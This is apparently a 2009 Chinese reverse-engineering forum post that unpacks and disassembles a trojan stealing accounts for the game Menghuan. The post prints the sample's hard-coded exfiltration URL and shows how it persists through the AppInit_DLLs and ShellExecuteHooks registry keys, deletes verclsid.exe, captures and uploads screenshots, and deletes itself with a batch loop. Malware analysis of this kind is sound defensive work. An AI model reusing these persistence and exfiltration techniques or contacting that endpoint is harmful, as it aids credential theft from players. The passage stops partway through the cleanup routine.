分析一个梦幻木马
本帖最后由 bester 于 2009-10-24 21:21 编辑[目标来源] : http://www.52pojie.cn/thread-33843-1-1.html
[使用工具] : Ollydbg,LordPE,ImpREC
OD载入,貌似加壳了……0040B239 >60 pushad
0040B23A E8 09000000 call 0040B248
0040B23F B7 B0 mov bh, 0xB0
0040B241 0000 add byte ptr , al
0040B243 E9 06020000 jmp 0040B44E
0040B248 33C9 xor ecx, ecx
0040B24A 5E pop esi
0040B24B 870E xchg dword ptr , ecx
0040B24D^ E3 F4 jecxz short 0040B243先试试能不能脱壳:
单步走着。
0040B409 8B5E 28 mov ebx, dword ptr ; KERNEL32.GetProcAddress
0040B40C 56 push esi
0040B40D 52 push edx
0040B40E 8B76 2C mov esi, dword ptr
0040B411 46 inc esi
0040B412 AD lods dword ptr
0040B413 85C0 test eax, eax
0040B415 5A pop edx
0040B416 74 22 je short 0040B43A
0040B418 03C2 add eax, edx
0040B41A 52 push edx
0040B41B 56 push esi ; 00408004ASCII "KERNEL32.DLL"
0040B41C 97 xchg eax, edi
0040B41D FF53 FC call dword ptr ; kernel32.LoadLibraryA
0040B420 95 xchg eax, ebp
0040B421 AC lods byte ptr
0040B422 84C0 test al, al
0040B424^ 75 FB jnz short 0040B421
0040B426 3806 cmp byte ptr , al
0040B428^ 74 E7 je short 0040B411 ; 切换另一个DLL模块。
0040B42A 8BC6 mov eax, esi
0040B42C 79 05 jns short 0040B433
0040B42E 46 inc esi
0040B42F 33C0 xor eax, eax
0040B431 66:AD lods word ptr
0040B433 50 push eax
0040B434 55 push ebp
0040B435 FF13 call dword ptr
0040B437 AB stos dword ptr es: ; 保存取到的API函数地址。
0040B438^ EB E7 jmp short 0040B421
看一下IAT:
0040400077DA7ABBadvapi32.RegQueryValueExA
0040400477DAE9F4advapi32.RegCreateKeyExA
0040400877DAEAE7advapi32.RegSetValueExA
0040400C77DA6C27advapi32.RegCloseKey
0040401077DB793Dadvapi32.CryptAcquireContextA
0040401477DB9C71advapi32.CryptCreateHash
0040401877DB9A9Eadvapi32.CryptHashData
0040401C77DB9DB4advapi32.CryptGetHashParam
0040402077DB9BCCadvapi32.CryptDestroyHash
0040402477DB7EEEadvapi32.CryptReleaseContext
0040402877DA7852advapi32.RegOpenKeyExA
0040402C00000000
.......
从这些API中,我们可以分析出如下的一些动作:0040400077DA7ABBadvapi32.RegQueryValueExA
0040400477DAE9F4advapi32.RegCreateKeyExA
0040400877DAEAE7advapi32.RegSetValueExA
0040400C77DA6C27advapi32.RegCloseKey
0040402877DA7852advapi32.RegOpenKeyExA
通过这些可以知道,这个程序有可能操作了注册表,比如自动启动之类。
004040587C81CB12kernel32.ExitProcess
0040405C7C802213kernel32.WriteProcessMemory
004040607C80BA71kernel32.VirtualQuery
004040647C80BA14kernel32.UnmapViewOfFile
004040687C80B9A5kernel32.MapViewOfFile
0040406C7C80950Akernel32.CreateFileMappingA
004040707C8650C8kernel32.Process32Next
004040747C864F55kernel32.Process32First
004040787C865C7Fkernel32.CreateToolhelp32Snapshot
0040407C7C801E1Akernel32.TerminateProcess
004040807C8309E9kernel32.OpenProcess
004040847C80A874kernel32.GetLocalTime
004040887C809B12kernel32.VirtualAllocEx
通过下面的API,我们可以知道,这个EXE应该是要释放一些文件到我们的硬盘上:004040BC7C810800kernel32.CreateFileW
004040C07C835D84kernel32.WritePrivateProfileStringA
004040C47C8286EEkernel32.CopyFileA
004040C87C814F8Akernel32.GetSystemDirectoryA
004040CC7C80B56Fkernel32.GetModuleFileNameA
004040D07C832B86kernel32.GetPrivateProfileStringA
004040D47C801D7Bkernel32.LoadLibraryA
004040D87C821363kernel32.GetWindowsDirectoryA
004040DC7C831EDDkernel32.DeleteFileA
004040E07C8106D7kernel32.CreateThread
004040E47C80B741kernel32.GetModuleHandleA
004040E87C802446kernel32.Sleep
004040EC7C80FDCDkernel32.GlobalAlloc
004040F07C80FFB9kernel32.GlobalLock
004040F47C8021D0kernel32.ReadProcessMemory
004040F87C810B17kernel32.GetFileSize
004040FC7C801812kernel32.ReadFile
004041007C801A28kernel32.CreateFileA
004041047C810C2Ekernel32.SetFilePointer
004041087C810E27kernel32.WriteFile
0040410C7C809BE7kernel32.CloseHandle
004041107C809B84kernel32.VirtualFree
004041147C8099C0kernel32.GetCurrentProcessId通过下面的API,可以猜测,它是不是截取屏幕图片了。00404044BitBlt gdi32
0040404CCreateCompatibleBitmap gdi32
00404050CreateCompatibleDC gdi32
0040403CGetDIBits gdi32 通过这些API可以看出这个病毒的目标是什么:0040416477D2A5AEuser32.EnumWindows
0040416877D3214Auser32.FindWindowExA
0040417C77D29655user32.GetWindow
0040418077D18A80user32.GetWindowThreadProcessId
0040418477D3216Buser32.GetWindowTextA
0040418877D2F45Fuser32.GetClassNameA
0040418C77D2D1D2user32.GetDesktopWindow从下面的这些API我们可以知道这个程序连接网络用来发送信息:00404194766C8E07wininet.InternetWriteFile
00404198766E3329wininet.HttpSendRequestExA
0040419C766940D2wininet.HttpAddRequestHeadersA
004041A076692B01wininet.HttpOpenRequestA
004041A47669345Awininet.InternetConnectA
004041A876695796wininet.InternetOpenA
004041AC766982F2wininet.InternetReadFile
004041B076694D94wininet.InternetCloseHandle
004041B4766E338Fwininet.HttpEndRequestA继续单步跟几下来到OEP:00401EEB 57 push edi ; 传说中的OEP?
00401EEC E8 BB000000 call 00401FAC
00401EF1 8BF8 mov edi, eax
00401EF3 6A 00 push 0x0 ; 感觉OEP应该在这里。
00401EF5 FF15 E4404000 call dword ptr ; kernel32.GetModuleHandleA
00401EFB 3BC7 cmp eax, edi
00401EFD 5F pop edi
00401EFE^ 0F85 19FEFFFF jnz 00401D1D
00401F04^ E9 ACFFFFFF jmp 00401EB5
00401F09 55 push ebp
00401F0A 8BEC mov ebp, esp
00401F0C 51 push ecx
00401F0D 51 push ecx
00401F0E 837D 14 00 cmp dword ptr , 0x0
00401F12 0F95C0 setne al到这里了,我们看一下程序引用的字符串:
Ultra String Reference
Address Disassembly Text String
00401045 push 00405688 lb@
004010C7 push 004056F0 wsgame
004011E1 push 00405000 tmprec.dat
0040133B push 00405000 tmprec.dat
004014A2 push 00405724 .bmp
004014B0 mov edi, 00405718 tmpimg.bmp
004014C2 push 00405700 i
004014DA push 004056F8 _s.bmp
0040158E push 00405734 解锁
0040159C push 0040572C 成功
004015F2 push 00405754 sname
0040162A push 0040574C nlevel
00401662 push 00405744 ncash
0040169A push 0040573C nsaving
004019B4 mov ebx, 0040575C mhmain.dll
00401A6F push 00405000 tmprec.dat
00401AA8 push 00405794 \fonts\
00401ABF push 00405788 aeiofs.dat
00401AD6 push 00405778 encionc_ch.dat
00401AED push 00405768 dnsricip.dat
00401B47 push 004057A0 0
00401B63 push 0040579C 1
00401C5E push 004057A0 0
00401DB2 push 004057F0 kb
00401DC2 push 004057DC %s%s%d%d%d%d%d.dll ;感觉这个名字应该是EXE释放的DLL名字,这个DLL应该是随机名字。
00401DF5 mov ebx, 004057A0 0
00401E26 mov edi, 004057B4 {9b1ae382-2647-4c4a-a313-b36b6ca34bd7}
00401E32 push 0040579C 1
00401E82 push 004057A4 \verclsid.exe
00401EEB push edi (initial cpu selection)
004021D1 push 00405800 wininet
00402208 mov eax, 004057F8 post
0040220F mov eax, 004057F4 get
004023A8 push 00405874 fileupload\n\ncontent-disposition: form-data; name="file1"; filename="%s"\n\ncontent-type: image/bmp\n\n\n\n ; 看起来向是TCP协议的内容,类型是图片文件。
004023B4 mov esi, 00405860 \n\nfileupload--\n\n ; 这些应该是构造TCP包用来向指定的URL传送图片。
004023CA mov esi, 00405840 referer:
004023E0 mov dword ptr , 00405808 content-type: multipart/form-data;boundary=fileupload
004025B6 push 00405988 appinit_dlls
004025BB push 00405950 software\microsoft\windows nt\currentversion\windows; 看到了,操作注册表了……
004026D0 push 00405934 software\classes\clsid\
004026F0 push 00405924 \inprocserver32
00402724 push 004057B4 {9b1ae382-2647-4c4a-a313-b36b6ca34bd7}
00402729 push 004058DC software\microsoft\windows\currentversion\explorer\shellexecutehooks ;操作注册表了……
0040277E push 004059B8 :repeat\n\ndel "%s"\n\nif exist "%s" goto repeat\n\ndel "c:\del%x.bat"\n\n ; 构造批处理的内容……
00402790 push 004059A8 c:\del%x.bat;是不是用来删除自身的一些批处理呀?
0040372E push 00405AC8 bmp
0040373C push 00405AC4 jpg
0040374A push 00405AC0 gif
00403758 push 00405ABC tif
00403766 push 00405AB8 png
004037FB push 00405AD8 - windows 图片和传真查看器
到这里,我想,我们应该可以从3个方面下手来分析这个程序:
1:这个程序释放了什么文件、做了什么操作;改了什么注册表信息(没有找到有操作服务的API所以暂不考虑服务问题)。
2:这个程序主要是针对什么,怎么做的操作(已经知道是梦幻的盗号木马,主要是分析怎么窃取到号码的)
3:将窃取到的信息怎么发送回去的,发送的目标是哪里。
先不废话,我们看一下OEP的入口部分:00401EEB >57 push edi ; OEP
00401EEC E8 BB000000 call 00401FAC
00401EF1 8BF8 mov edi, eax
00401EF3 6A 00 push 0x0
00401EF5 FF15 E4404000 call dword ptr [<&kernel32.GetModuleHandleA>>; kernel32.GetModuleHandleA
00401EFB 3BC7 cmp eax, edi
00401EFD 5F pop edi
00401EFE^ 0F85 19FEFFFF jnz 00401D1D ; 这里应该是用来区别程序的启动方式的,如果是DLL启动则跳走,否则就是EXE方式的启动。
00401F04^ E9 ACFFFFFF jmp 00401EB5OK,到这里,整个的程序结构我们可以猜测的出来,它支持两种运行模式:一种是以EXE的方式运行,另一种是以DLL的方式运行。
我们先看一下以EXE方式运行它:
加载脱壳后的程序,我们重头再看一下这个应用程序,:
00401EB4 C3 retn
00401EB5 33C0 xor eax, eax
00401EB7 90 nop
00401EB8 40 inc eax
00401EB9 83F8 FF cmp eax, -0x1
00401EBC^ 72 F9 jb short 00401EB7
00401EBE 8325 68624000 0>and dword ptr , 0x0
00401EC5 E8 CBFBFFFF call 00401A95
{
00401A95 56 push esi
00401A96 57 push edi
00401A97 BE 5C5F4000 mov esi, 00405F5C ; ASCII "C:\WINDOWS\Fonts\"
00401A9C 68 04010000 push 0x104
00401AA1 56 push esi
00401AA2 FF15 D8404000 call dword ptr [<&kernel32.GetWindowsDirecto>; kernel32.GetWindowsDirectoryA
00401AA8 68 94574000 push 00405794 ; \fonts\
00401AAD 56 push esi
00401AAE E8 251F0000 call <jmp.&msvcrt._mbscat>
00401AB3 BF 64614000 mov edi, 00406164 ; ASCII "C:\WINDOWS\Fonts\AeioFs.dat"
00401AB8 56 push esi
00401AB9 57 push edi
00401ABA E8 0D1F0000 call <jmp.&msvcrt._mbscpy>
00401ABF 68 88574000 push 00405788 ; aeiofs.dat
00401AC4 57 push edi
00401AC5 E8 0E1F0000 call <jmp.&msvcrt._mbscat>
00401ACA BF 60604000 mov edi, 00406060 ; ASCII "C:\WINDOWS\Fonts\Encionc_ch.dat"
00401ACF 56 push esi
00401AD0 57 push edi
00401AD1 E8 F61E0000 call <jmp.&msvcrt._mbscpy>
00401AD6 68 78574000 push 00405778 ; encionc_ch.dat
00401ADB 57 push edi
00401ADC E8 F71E0000 call <jmp.&msvcrt._mbscat>
00401AE1 56 push esi
00401AE2 BE 585E4000 mov esi, 00405E58 ; ASCII "C:\WINDOWS\Fonts\DNSRicip.dat"
00401AE7 56 push esi
00401AE8 E8 DF1E0000 call <jmp.&msvcrt._mbscpy>
00401AED 68 68574000 push 00405768 ; dnsricip.dat
00401AF2 56 push esi
00401AF3 E8 E01E0000 call <jmp.&msvcrt._mbscat>
00401AF8 83C4 38 add esp, 0x38
00401AFB 5F pop edi
00401AFC 5E pop esi
00401AFD C3 retn
这里多了两个dat文件,先不管他们的内容是什么,我们继续分析。
}
00401ECA 68 60604000 push 00406060 ; ASCII "C:\WINDOWS\Fonts\Encionc_ch.dat"
00401ECF E8 B1120000 call 00403185 ; 载入配置文件的内容
{
....
00403104 8D85 F8FEFFFF |lea eax, dword ptr ; 从配置信息中得到目标的URL:ASCII "http://61.164.108.204/mhceshi/lin.asp"
0040310A 50 |push eax
0040310B A1 BC654000 |mov eax, dword ptr
00403110 03C3 |add eax, ebx
00403112 50 |push eax
00403113 E8 B4080000 |call <jmp.&msvcrt._mbscpy>
00403118 8D45 B8 |lea eax, dword ptr
0040311B 50 |push eax
0040311C A1 BC654000 |mov eax, dword ptr
00403121 8D8403 80000000 |lea eax, dword ptr
00403128 50 |push eax
00403129 E8 9E080000 |call <jmp.&msvcrt._mbscpy>
0040312E 8D85 78FFFFFF |lea eax, dword ptr
00403134 50 |push eax
00403135 A1 BC654000 |mov eax, dword ptr
0040313A 8D8403 A0000000 |lea eax, dword ptr
00403141 50 |push eax
00403142 E8 85080000 |call <jmp.&msvcrt._mbscpy>
00403147 8D45 98 |lea eax, dword ptr
0040314A 50 |push eax
0040314B A1 BC654000 |mov eax, dword ptr
00403150 8D8403 C0000000 |lea eax, dword ptr
00403157 50 |push eax
00403158 E8 6F080000 |call <jmp.&msvcrt._mbscpy>
0040315D 83C4 20 |add esp, 0x20
00403160 FF45 F8 |inc dword ptr
00403163 81C3 E0000000 |add ebx, 0xE0
00403169 FF45 FC |inc dword ptr
0040316C 837D FC 64 |cmp dword ptr , 0x64
00403170^ 0F8C 04FFFFFF \jl 0040307A ; 这个循环将整个配置文件的内容载入到了内存中。
00403176 8B45 F8 mov eax, dword ptr
00403179 5F pop edi
0040317A A3 C0654000 mov dword ptr , eax ; 保存键的数量
0040317F 5E pop esi
00403180 5B pop ebx
00403181 C9 leave
00403182 C2 0400 retn 0x4
00403185 55 push ebp
}
00401ED4 E8 ADFEFFFF call 00401D86
{
00401D86/$55 push ebp
00401D87|.8BEC mov ebp, esp
00401D89|.81EC A0040000 sub esp, 0x4A0
00401D8F|.53 push ebx
00401D90|.56 push esi
00401D91|.8D45 F0 lea eax, dword ptr
00401D94|.57 push edi
00401D95|.50 push eax ; /pLocaltime
00401D96|.FF15 84404000 call dword ptr [<&kernel32.GetLocalTime>] ; \GetLocalTime
00401D9C|.0FB745 FC movzx eax, word ptr
00401DA0|.50 push eax ; /<%d>
00401DA1|.0FB745 FA movzx eax, word ptr ; |
00401DA5|.50 push eax ; |<%d>
00401DA6|.0FB745 F8 movzx eax, word ptr ; |
00401DAA|.50 push eax ; |<%d>
00401DAB|.0FB745 F6 movzx eax, word ptr ; |
00401DAF|.50 push eax ; |<%d>
00401DB0|.6A 00 push 0x0 ; |<%d> = 0
00401DB2|.68 F0574000 push 004057F0 ; |kb
00401DB7|.68 5C5F4000 push 00405F5C ; |<%s> = "C:\WINDOWS\Fonts\"
00401DBC|.8D85 6CFEFFFF lea eax, dword ptr ; |
00401DC2|.68 DC574000 push 004057DC ; |%s%s%d%d%d%d%d.dll
00401DC7|.50 push eax ; |s
00401DC8|.FF15 28414000 call dword ptr [<&msvcrt.sprintf>] ; \sprintf
堆栈: 0012FAEC 0012FE28ASCII "C:\WINDOWS\Fonts\kb02412355.dll"
0012FAF0 004057DCASCII "%s%s%d%d%d%d%d.dll"
0012FAF4 00405F5CASCII "C:\WINDOWS\Fonts\"
0012FAF8 004057F0ASCII "kb"继续:00401DE2|.BF 64614000 mov edi, 00406164 ;ASCII "C:\WINDOWS\Fonts\AeioFs.dat"
00401DE7|.BE 04010000 mov esi, 0x104
00401DEC|.8D85 60FBFFFF lea eax, dword ptr
00401DF2|.57 push edi ; /IniFileName => "C:\WINDOWS\Fonts\AeioFs.dat"
00401DF3|.56 push esi ; |BufSize => 104 (260.)
00401DF4|.50 push eax ; |ReturnBuffer
00401DF5|.BB A0574000 mov ebx, 004057A0 ; |0
00401DFA|.68 74644000 push 00406474 ; |Default = ""
00401DFF|.8D85 70FFFFFF lea eax, dword ptr ; |
00401E05|.53 push ebx ; |Key => "0"
00401E06|.50 push eax ; |Section
00401E07|.FF15 D0404000 call dword ptr [<&kernel32.GetPrivateProfileStringA>; \GetPrivateProfileStringA
00401E0D|.8D85 6CFEFFFF lea eax, dword ptr
00401E13|.57 push edi ; /FileName => "C:\WINDOWS\Fonts\AeioFs.dat"
00401E14|.50 push eax ; |String
00401E15|.8D85 70FFFFFF lea eax, dword ptr ; |
00401E1B|.53 push ebx ; |Key => "0"
00401E1C|.8B1D C0404000 mov ebx, dword ptr [<&kernel32.WritePrivateProfile>; |kernel32.WritePrivateProfileStringA
00401E22|.50 push eax ; |Section
00401E23|.FFD3 call ebx ; \WritePrivateProfileStringA
00401E25|.57 push edi ; /FileName => "C:\WINDOWS\Fonts\AeioFs.dat"
00401E26|.BF B4574000 mov edi, 004057B4 ; |{9b1ae382-2647-4c4a-a313-b36b6ca34bd7}
00401E2B|.57 push edi ; |String => "{9B1AE382-2647-4c4a-A313-B36B6CA34BD7}"
00401E2C|.8D85 70FFFFFF lea eax, dword ptr ; |
00401E32|.68 9C574000 push 0040579C ; |1
00401E37|.50 push eax ; |Section
00401E38|.FFD3 call ebx ; \WritePrivateProfileStringA看堆栈: 0012FAF8 0012FF2C|Section = "0"
0012FAFC 004057A0|Key = "0"
0012FB00 00406474|Default = ""
0012FB04 0012FB1C|ReturnBuffer = 0012FB1C
0012FB08 00000104|BufSize = 104 (260.)
0012FB0C 00406164\IniFileName = "C:\WINDOWS\Fonts\AeioFs.dat"查看一下这个配置文件:
0=C:\WINDOWS\Fonts\kb0241295.dll
1={9B1AE382-2647-4c4a-A313-B36B6CA34BD7}
继续: 00401E40|.56 push esi ; /BufSize => 104 (260.)
00401E41|.50 push eax ; |PathBuffer
00401E42|.6A 00 push 0x0 ; |hModule = NULL
00401E44|.FF15 CC404000 call dword ptr [<&kernel32.GetModuleFileNameA>] ; \GetModuleFileNameA
00401E4A|.8D85 6CFEFFFF lea eax, dword ptr
00401E50|.6A 00 push 0x0 ; /FailIfExists = FALSE
00401E52|.50 push eax ; |NewFileName
00401E53|.8D85 64FCFFFF lea eax, dword ptr ; |
00401E59|.50 push eax ; |ExistingFileName
00401E5A|.FF15 C4404000 call dword ptr [<&kernel32.CopyFileA>] ; \CopyFileA看堆栈: 0012FB04 0012FC20|ExistingFileName = "C:\Documents and Settings\Administrator\桌面\谔谔\Unpacked.exe"
0012FB08 0012FE28|NewFileName = "C:\WINDOWS\Fonts\kb02412355.dll"
0012FB0C 00000000\FailIfExists = FALSE00401E66|.6A 01 push 0x1
00401E68|.50 push eax
00401E69 >|.E8 E7010000 call 00402055 ; 创建文件映射将DLL载入内存。
00401E6E|.8D85 68FDFFFF lea eax, dword ptr
00401E74|.56 push esi ; /BufSize
00401E75|.50 push eax ; |Buffer
00401E76|.FF15 C8404000 call dword ptr [<&kernel32.GetSystemDirectoryA>] ; \GetSystemDirectoryA
00401E7C|.8D85 68FDFFFF lea eax, dword ptr
00401E82|.68 A4574000 push 004057A4 ; /\verclsid.exe
00401E87|.50 push eax ; |dest
00401E88|.E8 4B1B0000 call <jmp.&msvcrt._mbscat> ; \strcat
00401E8D|.59 pop ecx
00401E8E|.8D85 68FDFFFF lea eax, dword ptr
00401E94|.59 pop ecx
00401E95|.50 push eax ; /FileName
00401E96|.FF15 DC404000 call dword ptr [<&kernel32.DeleteFileA>] ; \DeleteFileA
从系统文件目录中找到名字为:verclsid.exe的文件,删除掉。
这个程序没有释放这个EXE,所以,这个EXE应该不是病毒,看他的名字也不像是一个Loader,先百度一下吧。
http://baike.baidu.com/view/1493045.htm?fr=ala0
通过上面的信息,我们知道,这个EXE是一个漏洞补丁程序。
OK到这里,我们知道:
1:这个程序的主要文件目录是:C:\WINDOWS\Fonts\
2:将EXE文件改名为DLL名字,大概模样是:"kb本地时间数字字符.dll",并拷贝到上面的目录中。
3:有一个名字为:AeioFs.dat的配置文件记录了DLL的名字和ID。
4:这个程序要删除一个补丁程序:verclsid.exe。
OK,我们继续: 00401E9C|.8D85 60FBFFFF lea eax, dword ptr
00401EA2|.50 push eax ; /Arg3
00401EA3|.8D85 6CFEFFFF lea eax, dword ptr ; |
00401EA9|.57 push edi ; |Arg2
00401EAA|.50 push eax ; |Arg1
00401EAB|.E8 D2060000 call 00402582 ; \复件_Unp.00402582看堆栈:
0012FB04 0012FE28|Arg1 = 0012FE28 ASCII "C:\WINDOWS\Fonts\kb02412355.dll"
0012FB08 004057B4|Arg2 = 004057B4 ASCII "{9B1AE382-2647-4c4a-A313-B36B6CA34BD7}"
0012FB0C 0012FB1C\Arg3 = 0012FB1C ASCII "C:\WINDOWS\Fonts\kb0241295.dll"
这是要做什么呢?文件替换么?跟进去看一下吧。{
00402585|.81EC 04080000 sub esp, 0x804
0040258B|.A0 74644000 mov al, byte ptr
00402590|.56 push esi
00402591|.57 push edi
00402592|.8885 FCFBFFFF mov byte ptr , al
00402598|.B9 FF000000 mov ecx, 0xFF
0040259D|.33C0 xor eax, eax
0040259F|.8DBD FDFBFFFF lea edi, dword ptr
004025A5|.BE 02000080 mov esi, 0x80000002
004025AA|.F3:AB rep stos dword ptr es:
004025AC|.66:AB stos word ptr es:
004025AE|.AA stos byte ptr es:
004025AF|.8D85 FCFBFFFF lea eax, dword ptr
004025B5|.50 push eax
004025B6|.68 88594000 push 00405988 ;appinit_dlls
004025BB|.68 50594000 push 00405950 ;software\microsoft\windows nt\currentversion\windows
004025C0|.56 push esi
004025C1|.E8 6FFFFFFF call 00402535 ;这是要修改注册表了
{
00402535/$55 push ebp
00402536|.8BEC mov ebp, esp
00402538|.51 push ecx
00402539|.8D45 0C lea eax, dword ptr
0040253C|.56 push esi
0040253D|.33F6 xor esi, esi
0040253F|.50 push eax ; /pHandle
00402540|.6A 01 push 0x1 ; |Access = KEY_QUERY_VALUE
00402542|.56 push esi ; |Reserved => 0
00402543|.FF75 0C push dword ptr ; |Subkey = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
00402546|.FF75 08 push dword ptr ; |hKey = HKEY_LOCAL_MACHINE
00402549|.FF15 28404000 call dword ptr [<&advapi32.RegOpenK>; \RegOpenKeyExA
0040254F|.85C0 test eax, eax
00402551|.75 1F jnz short 00402572
00402553|.8D45 08 lea eax, dword ptr
00402556|.50 push eax ; /pBufSize
00402557|.8D45 FC lea eax, dword ptr ; |
0040255A|.FF75 14 push dword ptr ; |Buffer
0040255D|.50 push eax ; |pValueType
0040255E|.56 push esi ; |Reserved => NULL
0040255F|.FF75 10 push dword ptr ; |ValueName = "AppInit_Dlls"
00402562|.FF75 0C push dword ptr ; |hKey = 5C
00402565|.FF15 00404000 call dword ptr [<&advapi32.RegQuery>; \RegQueryValueExA
0040256B|.85C0 test eax, eax
0040256D|.75 03 jnz short 00402572
0040256F|.6A 01 push 0x1
00402571|.5E pop esi
00402572|>FF75 0C push dword ptr ; /hKey
00402575|.FF15 0C404000 call dword ptr [<&advapi32.RegClose>; \RegCloseKey
0040257B|.8BC6 mov eax, esi
0040257D|.5E pop esi
0040257E|.C9 leave
0040257F\.C2 1000 retn 0x10
}
004025C6|.FF75 08 push dword ptr ; /s2 = "C:\WINDOWS\Fonts\kb02412355.dll"
004025C9|.8B3D 1C414000 mov edi, dword ptr [<&msvcrt.strst>; |msvcrt.strstr
004025CF|.8D85 FCFBFFFF lea eax, dword ptr ; |
004025D5|.50 push eax ; |s1 = "C:\WINDOWS\Fonts\kb02412355.dll"
004025D6|.FFD7 call edi ; \strstr
004025D8|.59 pop ecx
004025D9|.85C0 test eax, eax ;查找这个文件,如果找到了,跳过下面的处理。如果没有找到,则再注册表中创建一个。
....
004026CA|> \8D85 FCFBFFFF lea eax, dword ptr
004026D0|.68 34594000 push 00405934 ; /software\classes\clsid\
004026D5|.50 push eax ; |dest
004026D6|.E8 F1120000 call <jmp.&msvcrt._mbscpy> ; \strcpy
004026DB|.FF75 0C push dword ptr ; /src
004026DE|.8D85 FCFBFFFF lea eax, dword ptr ; |
004026E4|.50 push eax ; |dest
004026E5|.E8 EE120000 call <jmp.&msvcrt._mbscat> ; \strcat
004026EA|.8D85 FCFBFFFF lea eax, dword ptr
004026F0|.68 24594000 push 00405924 ; /\inprocserver32
004026F5|.50 push eax ; |dest
004026F6|.E8 DD120000 call <jmp.&msvcrt._mbscat> ; \strcat
00402703|.83C4 1C add esp, 0x1C
00402706|.50 push eax ; /Arg6
00402707|.8D85 FCFBFFFF lea eax, dword ptr ; |
0040270D|.FF75 08 push dword ptr ; |Arg5
00402710|.6A 01 push 0x1 ; |Arg4 = 00000001
00402712|.6A 00 push 0x0 ; |Arg3 = 00000000
00402714|.50 push eax ; |Arg2
00402715|.56 push esi ; |Arg1
00402716|.E8 C9FDFFFF call 004024E4 ; \复件_Unp.004024E4
这里构造了一个字符串:"SOFTWARE\Classes\CLSID\{9B1AE382-2647-4c4a-A313-B36B6CA34BD7}\InprocServer32",然后又一次的调用上个函数004024E4。
可以知道,这次是再这个根键下,又写入了这个DLL的路径。
0040271B|.6A 00 push 0x0 ; /Arg6 = 00000000
0040271D|.68 74644000 push 00406474 ; |Arg5 = 00406474
00402722|.6A 01 push 0x1 ; |Arg4 = 00000001
00402724|.68 B4574000 push 004057B4 ; |{9b1ae382-2647-4c4a-a313-b36b6ca34bd7}
00402729|.68 DC584000 push 004058DC ; |software\microsoft\windows\currentversion\explorer\shellexecutehooks
0040272E|.56 push esi ; |Arg1 = 80000002
0040272F|.E8 B0FDFFFF call 004024E4 ; \复件_Unp.004024E4
不用多说了。
}
}
00401ED9 E8 9BFEFFFF call 00401D79 ; 遍历进程
{
0040211C 55 push ebp
0040211D 8BEC mov ebp, esp
0040211F 81EC 28010000 sub esp, 0x128
00402125 837D 08 00 cmp dword ptr , 0x0
00402129 56 push esi
0040212A 74 61 je short 0040218D
0040212C 6A 00 push 0x0
0040212E 6A 02 push 0x2
00402130 E8 85180000 call <jmp.&kernel32.CreateToolhelp32Snapshot>
00402135 8BF0 mov esi, eax
00402137 83FE FF cmp esi, -0x1
0040213A 74 51 je short 0040218D
0040213C 57 push edi
0040213D 6A 49 push 0x49
0040213F 59 pop ecx
00402140 33C0 xor eax, eax
00402142 8DBD DCFEFFFF lea edi, dword ptr
00402148 F3:AB rep stos dword ptr es:
0040214A 8D85 D8FEFFFF lea eax, dword ptr
00402150 C785 D8FEFFFF 2>mov dword ptr , 0x128
0040215A 50 push eax
0040215B 56 push esi
0040215C E8 53180000 call <jmp.&kernel32.Process32First>
00402161 5F pop edi
00402162 85C0 /test eax, eax
00402164 74 20 |je short 00402186
00402166 FF75 0C |push dword ptr
00402169 8D85 D8FEFFFF |lea eax, dword ptr
0040216F 50 |push eax
00402170 FF55 08 |call dword ptr
00402173 85C0 |test eax, eax
00402175 74 0F |je short 00402186
00402177 8D85 D8FEFFFF |lea eax, dword ptr
0040217D 50 |push eax
0040217E 56 |push esi
0040217F E8 2A180000 |call <jmp.&kernel32.Process32Next>
00402184^ EB DC \jmp short 00402162
00402186 56 push esi
00402187 FF15 0C414000 call dword ptr [<&kernel32.CloseHandle>] ; kernel32.CloseHandle
0040218D 5E pop esi
0040218E C9 leave
0040218F C2 0800 retn 0x8
}
00401EDE E8 57080000 call 0040273A ; 再看下一段代码,应该是清理现场,收尾的工作:
{
0040273A/$55 push ebp ;
0040273B|.8BEC mov ebp, esp
0040273D|.81EC 10050000 sub esp, 0x510
00402743|.53 push ebx
00402744|.56 push esi
00402745|.57 push edi
00402746|.8D85 F4FDFFFF lea eax, dword ptr
0040274C|.68 04010000 push 0x104 ; /BufSize = 104 (260.)
00402751|.33FF xor edi, edi ; |
00402753|.50 push eax ; |PathBuffer
00402754|.57 push edi ; |hModule => NULL
00402755|.FF15 CC404000 call dword ptr [<&kernel32.GetModul>; \GetModuleFileNameA
得到了当前EXE文件的路径。
0040275B|.FF15 94404000 call dword ptr [<&kernel32.GetTickC>; [GetTickCount
00402761|.8BD8 mov ebx, eax
00402763|.8D85 F4FDFFFF lea eax, dword ptr
00402769|.8B35 28414000 mov esi, dword ptr [<&msvcrt.sprin>;msvcrt.sprintf
0040276F|.53 push ebx ; /<%x>
00402770|.50 push eax ; |<%s>
00402771|.8D85 F4FDFFFF lea eax, dword ptr ; |
00402777|.50 push eax ; |<%s>
00402778|.8D85 F0FAFFFF lea eax, dword ptr ; |
0040277E|.68 B8594000 push 004059B8 ; |:repeat\n\ndel "%s"\n\nif exist "%s" goto repeat\n\ndel "c:\del%x.bat"\n\n
00402783|.50 push eax ; |s
00402784|.FFD6 call esi ; \sprintf
构造批处理文件的内容。00402786|.83C4 14 add esp, 0x14
00402789|.8D85 F0FCFFFF lea eax, dword ptr
0040278F|.53 push ebx
00402790|.68 A8594000 push 004059A8 ;c:\del%x.bat
00402795|.50 push eax
00402796|.FFD6 call esi
00402798|.83C4 0C add esp, 0xC
0040279B|.8D85 F0FCFFFF lea eax, dword ptr
004027A1|.57 push edi ; /hTemplateFile
004027A2|.57 push edi ; |Attributes
004027A3|.6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
004027A5|.57 push edi ; |pSecurity
004027A6|.6A 01 push 0x1 ; |ShareMode = FILE_SHARE_READ
004027A8|.68 00000040 push 0x40000000 ; |Access = GENERIC_WRITE
004027AD|.50 push eax ; |FileName
004027AE|.FF15 00414000 call dword ptr [<&kernel32.CreateFi>; \创建批处理文件。
看堆栈:
0012FA84 0012FCAC|FileName = "c:\del1237519.bat"
0012FA88 40000000|Access = GENERIC_WRITE
0012FA8C 00000001|ShareMode = FILE_SHARE_READ
0012FA90 00000000|pSecurity = NULL
0012FA94 00000002|Mode = CREATE_ALWAYS
0012FA98 00000000|Attributes = 0
0012FA9C 00000000\hTemplateFile = NULL
004027B4|.8BF0 mov esi, eax
004027B6|.83FE FF cmp esi, -0x1
004027B9|.74 74 je short 0040282F
004027BB|.8D45 FC lea eax, dword ptr
004027BE|.57 push edi
004027BF|.50 push eax
004027C0|.8D85 F0FAFFFF lea eax, dword ptr
004027C6|.50 push eax ; /s
